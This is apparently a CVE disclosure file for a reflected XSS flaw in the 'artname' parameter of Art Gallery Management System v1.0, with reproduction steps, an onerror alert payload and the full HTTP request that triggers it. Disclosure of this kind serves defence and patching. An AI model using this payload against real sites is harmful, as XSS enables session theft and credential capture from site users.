CVE-2023-23161: CVE/CVE-2023-23161.txt at main · rahulpatwari/CVE

> [Suggested description] > A reflected cross-site scripting (XSS) vulnerability in Art Gallery > Management System Project v1.0 allows attackers to execute arbitrary > web scripts or HTML via a crafted payload injected into the artname > parameter under ART TYPE option in the navigation bar. > > ------------------------------------------ > > [Additional Information] > Steps to Reproduce: > 1. Navigate to the Products page by clicking on "ART TYPE". > 4. Now insert the XSS payload and click on “artname” parameter in the URL and click on ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)> > 5. After clicking on ENTER the XSS payload is executed and the alert Pops up with the domain name. > > ############ Product Page Request ############ > > GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1 > Host: localhost > Cache-Control: max-age=0 > sec-ch-ua: "Chromium";v="103", “.Not/A)Brand";v="99” > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: “Windows” > Upgrade-Insecure-Requests: 1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 > Sec-Fetch-Site: none > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q > Connection: close > > ------------------------------------------ > > [Vulnerability Type] > Cross Site Scripting (XSS) > > ------------------------------------------ > > [Vendor of Product] > https://phpgurukul.com/ > > ------------------------------------------ > > [Affected Product Code Base] > Art Gallery Management System Project - Art Gallery Management System Project - V 1.0 > > ------------------------------------------ > > [Affected Component] > http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures > > ------------------------------------------ > > [Attack Type] > Remote > > ------------------------------------------ > > [Impact Code execution] > true > > ------------------------------------------ > > [Impact Escalation of Privileges] > true > > ------------------------------------------ > > [Impact Information Disclosure] > true > > ------------------------------------------ > > [Attack Vectors] > Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim’s web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes. > XSS attacks can we used to perform a variety of malicious actions including: > 1. Stealing sensitive information > 2. Redirecting the victim to another webpage > 3. Executing arbitrary code > 4. Manipulating the appearance of the website > > ------------------------------------------ > > [Reference] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > [Discoverer] > Rahul Patwari Use CVE-2023-23161.